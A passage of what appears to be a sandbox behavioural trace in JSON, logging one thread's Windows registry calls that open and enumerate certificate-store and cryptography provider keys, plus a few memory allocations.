"RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000574" }, { "name": "Index", "value": "1" }, { "name": "ValueName", "value": "FuncName" }, { "name": "Data", "value": "LdapProvOpenStore" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\Ldap\\FuncName" } ], "repeated": 0, "id": 1739 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe88e", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000574" } ], "repeated": 0, "id": 1740 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe781", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegEnumKeyExA", "status": false, "return": "0x00000103", "pretty_return": "NO_MORE_ITEMS", "arguments": [ { "name": "Handle", "value": "0x00000570" }, { "name": "Index", "value": "2" }, { "name": "Name", "value": "" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\" } ], "repeated": 0, "id": 1741 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe8a4", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000570" } ], "repeated": 0, "id": 1742 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe6c9", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000056c" } ], "repeated": 0, "id": 1743 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe5c6", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" }, { "name": "Index", "value": "1" }, { "name": "Name", "value": "EncodingType 1" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1" } ], "repeated": 0, "id": 1744 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbe5f4", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000568" }, { "name": "SubKey", "value": "EncodingType 1" }, { "name": "Handle", "value": "0x0000056c" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1" } ], "repeated": 0, "id": 1745 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbec4c", "parentcaller": "0x7ffee0bbe6a7", "category": "registry", "api": "RegOpenKeyExA", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x0000056c" }, { "name": "SubKey", "value": "CertDllOpenStoreProv" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1\\CertDllOpenStoreProv" } ], "repeated": 0, "id": 1746 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbe6c9", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000056c" } ], "repeated": 0, "id": 1747 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbe5c6", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegEnumKeyExA", "status": false, "return": "0x00000103", "pretty_return": "NO_MORE_ITEMS", "arguments": [ { "name": "Handle", "value": "0x00000568" }, { "name": "Index", "value": "2" }, { "name": "Name", "value": "" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\" } ], "repeated": 0, "id": 1748 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbe6e2", "parentcaller": "0x7ffee0bbe47d", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1749 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0bba4dc", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\SystemCertificates\\Root\\PhysicalStores" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root\\PhysicalStores" } ], "repeated": 0, "id": 1750 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacd4d", "parentcaller": "0x7ffee0bba4dc", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\SystemCertificates\\Root" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x0003001f", "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1751 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bb703e", "parentcaller": "0x7ffee0bba69a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1752 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bc1c01", "parentcaller": "0x7ffee0bb77b9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" } ], "repeated": 0, "id": 1753 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bd5a88", "parentcaller": "0x7ffee0bb77d4", "category": "misc", "api": "NtQuerySystemInformation", "status": true, "return": "0x00000000", "arguments": [ { "name": "SystemInformationClass", "value": "103" } ], "repeated": 1, "id": 1754 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacd4d", "parentcaller": "0x7ffee0bba9de", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\SystemCertificates\\Root" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x0003001f", "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1755 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0bb5d0c", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000568" }, { "name": "SubKey", "value": "" }, { "name": "Handle", "value": "0x0000056c" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\" } ], "repeated": 0, "id": 1756 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbab7c", "parentcaller": "0x7ffee0bb7e1f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1757 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacd4d", "parentcaller": "0x7ffee0bba9de", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x0003001f", "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1758 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0bb5d0c", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000568" }, { "name": "SubKey", "value": "" }, { "name": "Handle", "value": "0x00000570" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\" } ], "repeated": 0, "id": 1759 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbab7c", "parentcaller": "0x7ffee0bb7e1f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1760 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0bba4dc", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\EnterpriseCertificates\\Root\\PhysicalStores" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root\\PhysicalStores" } ], "repeated": 0, "id": 1761 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacd4d", "parentcaller": "0x7ffee0bba4dc", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\EnterpriseCertificates\\Root" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x0003001f", "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1762 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bb703e", "parentcaller": "0x7ffee0bba69a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1763 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacd4d", "parentcaller": "0x7ffee0bba9de", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\EnterpriseCertificates\\Root" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x0003001f", "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1764 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0bb5d0c", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000568" }, { "name": "SubKey", "value": "" }, { "name": "Handle", "value": "0x00000574" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\" } ], "repeated": 0, "id": 1765 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbab7c", "parentcaller": "0x7ffee0bb7e1f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1766 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacd4d", "parentcaller": "0x7ffee0bba9de", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\SystemCertificates\\SmartCardRoot" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x0003001f", "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\SmartCardRoot" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1767 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbab7c", "parentcaller": "0x7ffee0bb7e1f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1768 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0bba9de", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\SystemCertificates\\SmartCardRoot" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\SmartCardRoot" } ], "repeated": 0, "id": 1769 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbab7c", "parentcaller": "0x7ffee0bb7e1f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1770 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0bba4dc", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\SystemCertificates\\CA\\PhysicalStores" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA\\PhysicalStores" } ], "repeated": 0, "id": 1771 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacd4d", "parentcaller": "0x7ffee0bba4dc", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\SystemCertificates\\CA" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x0003001f", "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1772 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bb703e", "parentcaller": "0x7ffee0bba69a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1773 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacd4d", "parentcaller": "0x7ffee0bba9de", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\SystemCertificates\\CA" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x0003001f", "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1774 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0bb5d0c", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000568" }, { "name": "SubKey", "value": "" }, { "name": "Handle", "value": "0x00000578" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\" } ], "repeated": 0, "id": 1775 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbab7c", "parentcaller": "0x7ffee0bb7e1f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1776 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d71000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1777 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0bba4dc", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\EnterpriseCertificates\\CA\\PhysicalStores" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA\\PhysicalStores" } ], "repeated": 0, "id": 1778 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacd4d", "parentcaller": "0x7ffee0bba4dc", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\EnterpriseCertificates\\CA" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x0003001f", "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1779 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bb703e", "parentcaller": "0x7ffee0bba69a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1780 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacd4d", "parentcaller": "0x7ffee0bba9de", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\EnterpriseCertificates\\CA" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x0003001f", "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1781 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0bb5d0c", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000568" }, { "name": "SubKey", "value": "" }, { "name": "Handle", "value": "0x0000057c" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\" } ], "repeated": 0, "id": 1782 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbab7c", "parentcaller": "0x7ffee0bb7e1f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1783 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9fead", "parentcaller": "0x7ffee0b9ed36", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "AutoFlags" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlags" } ], "repeated": 0, "id": 1784 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d74000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1785 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9f774", "parentcaller": "0x7ffee0b9de30", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "DisableAutoFlushProcessNameList" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableAutoFlushProcessNameList" } ], "repeated": 0, "id": 1786 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9fead", "parentcaller": "0x7ffee0b9ed92", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "AutoFlushFirstDeltaSeconds" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushFirstDeltaSeconds" } ], "repeated": 0, "id": 1787 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9fead", "parentcaller": "0x7ffee0b9edbe", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "AutoFlushNextDeltaSeconds" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushNextDeltaSeconds" } ], "repeated": 0, "id": 1788 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0ba1c01", "parentcaller": "0x7ffee0ba2286", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1789 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000056c" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates" } ], "repeated": 0, "id": 1790 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "108FBF794E18EC5347A414E4370CC4506C297AB2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2" } ], "repeated": 0, "id": 1791 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "108FBF794E18EC5347A414E4370CC4506C297AB2" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2" } ], "repeated": 0, "id": 1792 }, { "timestamp": "2025-11-20 10:58:35,391", 